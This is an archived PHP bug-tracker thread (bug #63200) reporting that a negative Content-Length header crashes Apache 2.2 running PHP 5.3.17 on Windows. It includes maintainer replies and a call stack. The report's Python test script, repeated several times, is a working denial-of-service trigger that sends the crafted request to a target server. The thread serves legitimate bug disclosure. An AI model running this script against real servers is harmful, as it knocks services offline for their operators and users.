[PHP-BUG] Bug #63200 [NEW]: Apache 2.2 crashes when PHP called with negative Content-Length HTTP header

2012-10-02 Thread chris at whyley dot com
From: chris at whyley dot com
Operating system: Windows Server 2003
PHP version:  5.3.17
Package:  Reproducible crash
Bug Type: Bug
Bug description:Apache 2.2 crashes when PHP called with negative Content-Length 
HTTP header

Description:

Apache 2.2 with PHP 5.3.17 on Windows Server 2003 can be made to repeatably
crash 
by doing the following:

(1) Configure your Apache server to use a custom error handling page for
the HTTP 
413 error (Request entity too large) by inserting this line into your
httpd.conf:

ErrorDocument 413 /error/

(2) Run the Python test script detailed below to send an HTTP GET request
to the 
server with a negative integer for the HTTP "Content-Length" header and
with the 
"Accept-Encoding" header set to "gzip, deflate"

When this is run, Apache crashes with the following error:

[Tue Oct 02 13:46:16 2012] [error] [client 10.211.55.3] Invalid
Content-Length
[Tue Oct 02 13:46:22 2012] [notice] Parent: child process exited with
status 
3221225477 -- Restarting.

This issue is a particular problem in the wild where many modern browsers
aren't 
capable of handling file uploads over 2GB in size - instead of posting an 
accurate filesize for the Content-Length header they use a negative integer

instead, causing the Apache server running PHP to crash. For further
information 
on this see http://www.motobit.com/help/scptutl/pa98.htm

The script could be used to perform DOS attacks on vulnerable systems.

Test script:
---
#!/usr/bin/python
 
import socket, sys
target = "10.211.55.3"
port   = 80;
request  = "GET / HTTP/1.1\n"
request += "Host: "+target+"\n"
request += "Accept-Encoding:gzip, deflate\n"
request += "Content-Length: -1\n\n" 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
  s.connect((target, port))
except:
  print "[-] Connection to %s:%s failed!" % (target, port)
  sys.exit(0)
print "[+] Sending HTTP request. Check for crash on target."
s.send(request)
s.close()

Expected result:

Stable Apache, no crash.

Actual result:
--
Thread 2 - System ID 3008
Entry point   msvcrt!_endthreadex+3a 
Create time   10/2/2012 2:29:08 PM 
Time spent in user mode   0 Days 0:0:0.0 
Time spent in kernel mode   0 Days 0:0:0.15 


Full Call Stack

Function Arg 1 Arg 2 Arg 3 Arg 4   Source 
php5ts!zend_hash_index_find+17 016f3460 000d 018ee6c0 
   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_hash.c @ 985 
php5ts!_zend_list_delete+27 000d 016b0150 029811c0
016b0150   
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_list.c @ 55 + 27 
php5ts!_php_stream_free+ae 029811c0 0003 016b0150
029811c0   
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\streams\streams.c @ 399 + a 
php5ts!php_zend_stream_mmap_closer+1a 029811c0 016b0150
0290a4e0 
007339f4   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\main.c @ 1192 + 9 
php5ts!zend_file_handle_dtor+2a 0290a4e8 016b0150 

   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_stream.c @ 316
+ 8 
php5ts!file_handle_dtor+14 0290a4e8 018ee828 018ee798
   
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_compile.c @ 174 + b 
php5ts!zend_llist_del_element+71 016b1754 018ee828 007d9810

016b0150   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_llist.c @ 99 +
36 
php5ts!zend_destroy_file_handle+26 018ee828 016b0150 016b0150  
  
016b0150  
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_language_scanner.l @ 
242 
php5ts!zend_execute_scripts+c4 0002 016b0150  
0001   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend.c @ 1234 
php5apache2_2!php_handler+64c 00fba200 006348e0 00fba200
   
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\sapi\apache2handler\sapi_apache2.c @
671 + 
13 
libhttpd!ap_run_handler+25 00fba200 6eed3de0 00fba200
00634f68
libhttpd!ap_invoke_handler+b0  00fb8938 018ee8f8
6ff0ef68
libhttpd!ap_internal_redirect+37 00634f68 00fb8938 00eb6c50

019d
libhttpd!ap_die+1e8 00fb8938  0001 00fba118   

libhttpd!ap_http_header_filter+9f 00fb96f8 00fba118 00fba118   
 
018ee974
libhttpd!ap_pass_brigade+52 00fb96f8 00fba118 
00fba118
libhttpd!ap_content_length_filter+a9 00fb96e0 00eb6cb0 00fb96c8

018ee9e0
libhttpd!ap_pass_brigade+52 00fb96e0 00fba118 6fba4309
00fba118
libhttpd!ap_byterange_filter+474 00fb96c8 00fba118 00fba060

018eea1c
libhttpd!ap_pass_brigade+52 00fb96c8 00fba118 00eb6cb0
00fba118
mod_deflate+1352 00fba060 00fba118 00fba0c0 018eea58
libhttpd!ap_pass_brigade

Bug #63200 [Com]: Apache 2.2 crashes when PHP called with negative Content-Length HTTP header

2012-10-05 Thread chris at whyley dot com
Edit report at https://bugs.php.net/bug.php?id=63200&edit=1

 ID: 63200
 Comment by: chris at whyley dot com
 Reported by:chris at whyley dot com
 Summary:Apache 2.2 crashes when PHP called with negative
 Content-Length HTTP header
 Status: Feedback
 Type:   Bug
 Package:Reproducible crash
 Operating System:   Windows Server 2003
 PHP Version:5.3.17
 Block user comment: N
 Private report: N

 New Comment:

I have not tested this issue under version 5.4 as my environment is setup for 
5.3.17 - Are you able to recreate in 5.3.17 ?

It always crashes no matter what I have in index.php - in fact I can call any 
page and cause the crash to happen.


Previous Comments:

[2012-10-05 04:26:26] larue...@php.net

I can not reproduce this with 5.4, and from the backtrace, it seems crash in 
another place.

so, is it related with your index.php?  does it always crash no matter what the 
index.php is?


[2012-10-02 14:45:02] chris at whyley dot com

Description:

Apache 2.2 with PHP 5.3.17 on Windows Server 2003 can be made to repeatably 
crash 
by doing the following:

(1) Configure your Apache server to use a custom error handling page for the 
HTTP 
413 error (Request entity too large) by inserting this line into your 
httpd.conf:

ErrorDocument 413 /error/

(2) Run the Python test script detailed below to send an HTTP GET request to 
the 
server with a negative integer for the HTTP "Content-Length" header and with 
the 
"Accept-Encoding" header set to "gzip, deflate"

When this is run, Apache crashes with the following error:

[Tue Oct 02 13:46:16 2012] [error] [client 10.211.55.3] Invalid Content-Length
[Tue Oct 02 13:46:22 2012] [notice] Parent: child process exited with status 
3221225477 -- Restarting.

This issue is a particular problem in the wild where many modern browsers 
aren't 
capable of handling file uploads over 2GB in size - instead of posting an 
accurate filesize for the Content-Length header they use a negative integer 
instead, causing the Apache server running PHP to crash. For further 
information 
on this see http://www.motobit.com/help/scptutl/pa98.htm

The script could be used to perform DOS attacks on vulnerable systems.

Test script:
---
#!/usr/bin/python
 
import socket, sys
target = "10.211.55.3"
port   = 80;
request  = "GET / HTTP/1.1\n"
request += "Host: "+target+"\n"
request += "Accept-Encoding:gzip, deflate\n"
request += "Content-Length: -1\n\n" 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
  s.connect((target, port))
except:
  print "[-] Connection to %s:%s failed!" % (target, port)
  sys.exit(0)
print "[+] Sending HTTP request. Check for crash on target."
s.send(request)
s.close()

Expected result:

Stable Apache, no crash.

Actual result:
--
Thread 2 - System ID 3008
Entry point   msvcrt!_endthreadex+3a 
Create time   10/2/2012 2:29:08 PM 
Time spent in user mode   0 Days 0:0:0.0 
Time spent in kernel mode   0 Days 0:0:0.15 


Full Call Stack

Function Arg 1 Arg 2 Arg 3 Arg 4   Source 
php5ts!zend_hash_index_find+17 016f3460 000d 018ee6c0 
   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_hash.c @ 985 
php5ts!_zend_list_delete+27 000d 016b0150 029811c0 016b0150 
  
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_list.c @ 55 + 27 
php5ts!_php_stream_free+ae 029811c0 0003 016b0150 029811c0  
 
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\streams\streams.c @ 399 + a 
php5ts!php_zend_stream_mmap_closer+1a 029811c0 016b0150 0290a4e0
 
007339f4   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\main.c @ 1192 + 9 
php5ts!zend_file_handle_dtor+2a 0290a4e8 016b0150  
   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_stream.c @ 316 + 8 
php5ts!file_handle_dtor+14 0290a4e8 018ee828 018ee798   
 
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_compile.c @ 174 + b 
php5ts!zend_llist_del_element+71 016b1754 018ee828 007d9810 
016b0150   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_llist.c @ 99 + 36 
php5ts!zend_destroy_file_handle+26 018ee828 016b0150 016b0150 
016b0150   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_language_scanner.l 
@ 
242 
php5ts!zend_execute_scripts+c4 0002 016b0150  
0001   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend.c @ 1234 
php5apache2_2!php_handler+64c 00fba200 006348e0 00fba200 
   
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\sapi\apache2handler\sapi_apache2.c @ 671 
+

Bug #63200 [NoF->Opn]: Apache 2.2 crashes when PHP called with negative Content-Length HTTP header

2013-02-18 Thread chris at whyley dot com
Edit report at https://bugs.php.net/bug.php?id=63200&edit=1

 ID: 63200
 User updated by:chris at whyley dot com
 Reported by:chris at whyley dot com
 Summary:Apache 2.2 crashes when PHP called with negative
 Content-Length HTTP header
-Status: No Feedback
+Status: Open
 Type:   Bug
 Package:Reproducible crash
 Operating System:   Windows Server 2003
 PHP Version:5.3.17
 Block user comment: N
 Private report: N

 New Comment:

Re-opening this bug as it still exists in the 5.3 stream.


Previous Comments:

[2013-02-18 00:36:03] php-bugs at lists dot php dot net

No feedback was provided. The bug is being suspended because
we assume that you are no longer experiencing the problem.
If this is not the case and you are able to provide the
information that was requested earlier, please do so and
change the status of the bug back to "Open". Thank you.


[2012-10-05 10:26:01] chris at whyley dot com

I have not tested this issue under version 5.4 as my environment is setup for 
5.3.17 - Are you able to recreate in 5.3.17 ?

It always crashes no matter what I have in index.php - in fact I can call any 
page and cause the crash to happen.


[2012-10-05 04:26:26] larue...@php.net

I can not reproduce this with 5.4, and from the backtrace, it seems crash in 
another place.

so, is it related with your index.php?  does it always crash no matter what the 
index.php is?


[2012-10-02 14:45:02] chris at whyley dot com

Description:

Apache 2.2 with PHP 5.3.17 on Windows Server 2003 can be made to repeatably 
crash 
by doing the following:

(1) Configure your Apache server to use a custom error handling page for the 
HTTP 
413 error (Request entity too large) by inserting this line into your 
httpd.conf:

ErrorDocument 413 /error/

(2) Run the Python test script detailed below to send an HTTP GET request to 
the 
server with a negative integer for the HTTP "Content-Length" header and with 
the 
"Accept-Encoding" header set to "gzip, deflate"

When this is run, Apache crashes with the following error:

[Tue Oct 02 13:46:16 2012] [error] [client 10.211.55.3] Invalid Content-Length
[Tue Oct 02 13:46:22 2012] [notice] Parent: child process exited with status 
3221225477 -- Restarting.

This issue is a particular problem in the wild where many modern browsers 
aren't 
capable of handling file uploads over 2GB in size - instead of posting an 
accurate filesize for the Content-Length header they use a negative integer 
instead, causing the Apache server running PHP to crash. For further 
information 
on this see http://www.motobit.com/help/scptutl/pa98.htm

The script could be used to perform DOS attacks on vulnerable systems.

Test script:
---
#!/usr/bin/python
 
import socket, sys
target = "10.211.55.3"
port   = 80;
request  = "GET / HTTP/1.1\n"
request += "Host: "+target+"\n"
request += "Accept-Encoding:gzip, deflate\n"
request += "Content-Length: -1\n\n" 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
  s.connect((target, port))
except:
  print "[-] Connection to %s:%s failed!" % (target, port)
  sys.exit(0)
print "[+] Sending HTTP request. Check for crash on target."
s.send(request)
s.close()

Expected result:

Stable Apache, no crash.

Actual result:
--
Thread 2 - System ID 3008
Entry point   msvcrt!_endthreadex+3a 
Create time   10/2/2012 2:29:08 PM 
Time spent in user mode   0 Days 0:0:0.0 
Time spent in kernel mode   0 Days 0:0:0.15 


Full Call Stack

Function Arg 1 Arg 2 Arg 3 Arg 4   Source 
php5ts!zend_hash_index_find+17 016f3460 000d 018ee6c0 
   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_hash.c @ 985 
php5ts!_zend_list_delete+27 000d 016b0150 029811c0 016b0150 
  
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_list.c @ 55 + 27 
php5ts!_php_stream_free+ae 029811c0 0003 016b0150 029811c0  
 
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\streams\streams.c @ 399 + a 
php5ts!php_zend_stream_mmap_closer+1a 029811c0 016b0150 0290a4e0
 
007339f4   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\main.c @ 1192 + 9 
php5ts!zend_file_handle_dtor+2a 0290a4e8 016b0150  
   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_stream.c @ 316 + 8 
php5ts!file_handle_dtor+14 0290a4e8 018ee828 018ee798   
 
c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_compile.c @ 174 + b 
ph